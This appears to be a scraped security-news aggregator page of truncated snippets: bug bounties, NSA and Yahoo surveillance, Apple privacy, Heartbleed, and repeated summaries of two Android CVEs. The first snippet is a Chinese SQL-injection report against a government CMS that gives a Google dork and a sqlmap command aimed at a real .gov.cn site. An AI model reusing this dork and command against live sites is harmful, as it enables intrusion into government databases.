某政府行政cmssql注入漏洞

简要描述： rt 详细说明： 问题厂商：深圳太极软件有限公司 问题cms：jsp+sqlserver 注入全为sa权限 谷歌关键字：inurl:application/zwdt 问题出在 全局搜索 application/zwdt/query.jsp post:keyword= 选取五例： 1.http://www.lzxzsp.gov.cn sqlmap -u "http://www.lzxzsp.gov.cn/application/zwdt/query.jsp" --data "keyword=1&Submit3=%B2%E9%D1%AF" --dbs sqlmap -u...

As Bug Bounties Become the Norm, Challenges Remain

SEATTLE–For many years, Microsoft and other large software vendors resisted the idea of providing bug bounties or other financial incentives for researchers to report vulnerabilities. That changed when the landscape began to shift and more researchers began reporting vulnerabilities through broke...

Chinese Penetrate TRANSCOM Amid Lack of Data Sharing

Hackers allegedly affiliated with the Chinese government compromised the computer networks of the United States Transportation Command, the group tasked with providing air, land and sea transportation services to the Department of Defense, according to the findings of a Senate Armed Services...

Apple CEO Tim Cook Says Company Dedicated to Protecting Users' Privacy

While much of the tech community is still swooning over the iPhone 6, Apple Pay and Apple Watch, the company’s top executive is spending a lot of time and energy trying to reassure customers that Apple is doing everything it can to protect their privacy and the security of their data. Apple CEO T...

White House: Internet Not Borderless, but Lacking Interior

WASHINGTON D.C. – In an afternoon keynote address at the Billington Cybersecurity Summit yesterday, Michael Daniel, a special assistant to the president and White House Cybersecurity Coordinator, refuted the common sentiment that the Internet is difficult to defend because it is borderless. To th...

2014 Google Transparency Report Requests for Data Up Again

Against a backdrop of new surveillance programs being uncovered in New Zealand and allegations of the NSA and GCHQ’s penetration of Deutsche Telekom in Germany, Google yesterday published its biannual Transparency Report for the first half of 2014. Google’s numbers reflect not only a continually...

NSA Director Urges Cyber-Resilience at Billington Summit

WASHINGTON, D.C. – In his keynote address at the Billington Cybersecurity Summit, NSA Director and Commander of U.S. Cyber Command, Admiral Mike Rogers, explained that the Defense Department and corporate information security teams must focus on cyber-resiliency rather than total network...

Apple CEO Defends iMessage Security

Despite research published last year that demonstrated that Apple has the ability to decrypt users iMessages if it so chooses, Apple CEO Tim Cook said that the company does not hold the encryption key for those messages and couldn’t even produce the plaintext in response to a government order. In...

“Bleeding heart”vulnerability before the announcement may have been government agencies use-vulnerability warning-the black bar safety net

“Bleeding heart”vulnerability is already in the history of the Internet the most serious defects. However, the new study showed that“heart bleed”vulnerability in April broke before, there is no evidence that the heartbleed vulnerability has been used by hackers to large-scale use.“ Bleeding...

Documents in Long-Running Yahoo FISC Challenge Case Published

During a long-running secret dispute between Yahoo and government officials over the constitutionality of orders from the federal government to turn over data belonging to Yahoo users, the company was facing fines of $250,000 for refusing to comply with the order. The revelation is contained in a...

Dropbox Reports 80 Percent of Subpoenas Contain Gag Request

Most U.S. government subpoenas for data on Dropbox users are accompanied with a request not to inform the user in question. Dropbox legal counsel Bart Volkmer said those gag orders are repelled unless there is a valid court order. The revelation accompanied the release of the cloud storage...

NSA threatened Yahoo with $250,000 Daily Fine For Opposing Surveillance Request

Yahoo! has broke its silence and explained why it handed over its users’ data to United States federal officials, thereby promising to expose those court documents which ordered the snooping. The US government threatened Internet giant with a $250,000 fine per day several years ago if it failed t...

CVE-2014-5772

The Government Bookstore aka hksarg.isd.sop.govbookstore application 1.01 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...

CVE-2014-5746

The Government Best Jobs aka com.wGovernmentBestJobs application 0.1 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...

Information disclosure

The Government Bookstore aka hksarg.isd.sop.govbookstore application 1.01 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...

Design/Logic Flaw

The Government Best Jobs aka com.wGovernmentBestJobs application 0.1 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...

CVE-2014-5772

The CVE-2014-5772 entry concerns the Government Bookstore Android app (version 1.01). The vulnerability is that it does not verify X.509 certificates from SSL servers, which can allow man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. Exploita...

CVE-2014-5746

The CVE-2014-5746 entry concerns the Government Best Jobs Android app (com.wGovernmentBestJobs) version 0.1, which does not verify X.509 certificates from SSL servers. This root cause enables man‑in‑the‑middle attackers to spoof servers and obtain sensitive information via a crafted certificate. ...

CVE-2014-5772

The Government Bookstore aka hksarg.isd.sop.govbookstore application 1.01 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...

CVE-2014-5746

The Government Best Jobs aka com.wGovernmentBestJobs application 0.1 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...